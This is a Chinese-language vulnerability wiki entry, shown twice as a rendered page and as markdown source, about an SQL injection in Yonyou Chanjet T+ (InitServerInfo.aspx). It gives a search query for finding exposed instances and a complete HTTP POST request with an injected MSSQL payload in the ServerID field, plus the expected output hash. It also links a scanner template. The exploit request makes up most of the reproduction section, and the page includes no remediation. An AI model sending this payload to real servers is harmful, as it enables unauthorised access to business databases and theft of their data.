fofamini-wiki

登录白背景

源码

用友畅捷通TPlus InitServerInfo存在SQL注入漏洞

一、漏洞简介

畅捷通T+专属云适用于需要一体化管理的企业，财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。用友畅捷通TPlus InitServerInfo存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。

二、影响版本

用友畅捷通TPlus

三、资产测绘

hunnterapp.name="畅捷通 T+"
登录页面

四、漏洞复现

POST /tplus/UFAQD/InitServerInfo.aspx?preload=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 113

operbtn=create&ServerID=1'%2b(select 1 where 1 in (SELECT sys.fn_varbintohexstr(hashbytes('MD5','123456'))))%2b'1

0xce0bfd15059b68d67688884d7a3d3e8c

yongyoutplus-initserverinfo-sqli.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/qhna8kg9i43xbvc9

# 用友畅捷通TPlus InitServerInfo存在SQL注入漏洞

# 一、漏洞简介
畅捷通T+专属云适用于需要一体化管理的企业，财务管理、业务管理、零售管理、生产管理、物流管理、移动仓管、营销管理、委外加工等人财货客一体化管理。用友畅捷通TPlus InitServerInfo存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。

# 二、影响版本

- 用友畅捷通TPlus

# 三、资产测绘

- hunnter`app.name="畅捷通 T+"`
- 登录页面

![image.png](./img/gOu5kdTRmauksyOQ/1693740551445-cd97f856-77f1-472d-b780-9a2a25ce0a26-849731.png)

# 四、漏洞复现
```java
POST /tplus/UFAQD/InitServerInfo.aspx?preload=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 113

operbtn=create&ServerID=1'%2b(select 1 where 1 in (SELECT sys.fn_varbintohexstr(hashbytes('MD5','123456'))))%2b'1
```
![image.png](./img/gOu5kdTRmauksyOQ/1710295361891-6a1a60cd-c155-45f6-9359-57c8ef466bc3-412172.png)
```java
0xce0bfd15059b68d67688884d7a3d3e8c
```
[yongyoutplus-initserverinfo-sqli.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1711076731028-57f2dbbe-19ac-4f26-bd6e-b8ead127086f.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1711076731028-57f2dbbe-19ac-4f26-bd6e-b8ead127086f.yaml%22%2C%22name%22%3A%22yongyoutplus-initserverinfo-sqli.yaml%22%2C%22size%22%3A1076%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u77d90a03-a93c-4a09-b098-31a466a2a7e%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22ud0505731%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qhna8kg9i43xbvc9>